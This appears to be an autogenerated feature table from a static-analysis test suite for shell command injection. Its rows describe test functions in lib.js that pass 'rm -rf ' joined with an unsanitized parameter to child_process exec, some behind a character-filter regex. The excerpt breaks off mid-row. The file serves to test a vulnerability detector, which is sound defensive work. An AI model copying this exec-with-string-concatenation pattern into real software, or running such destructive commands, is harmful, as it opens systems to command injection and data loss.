autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:6:202:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:6:202:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:6:202:9 | exec | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:6:202:9 | exec | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:6:202:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:19 | "rm -rf " | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:11:202:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:23:202:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:23:202:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:23:202:26 | name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:23:202:26 | name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:23:202:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:23:202:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:31 | module. ... OfChars | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:31 | module. ... OfChars | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:206:31 | module. ... OfChars | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:214:1 | module. ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:214:1 | module. ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:1:214:1 | module. ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:8:206:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:8:206:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:8:206:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:16:206:31 | whitelistOfChars | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:16:206:31 | whitelistOfChars | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:16:206:31 | whitelistOfChars | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | cp | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | cp | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | this | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | this | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:206:34 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | 'arguments' object of anonymous function | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | exceptional return of anonymous function | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | functio ... OK\\n\\t}\\n} | assignedToPropName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | functio ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | functio ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | functio ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 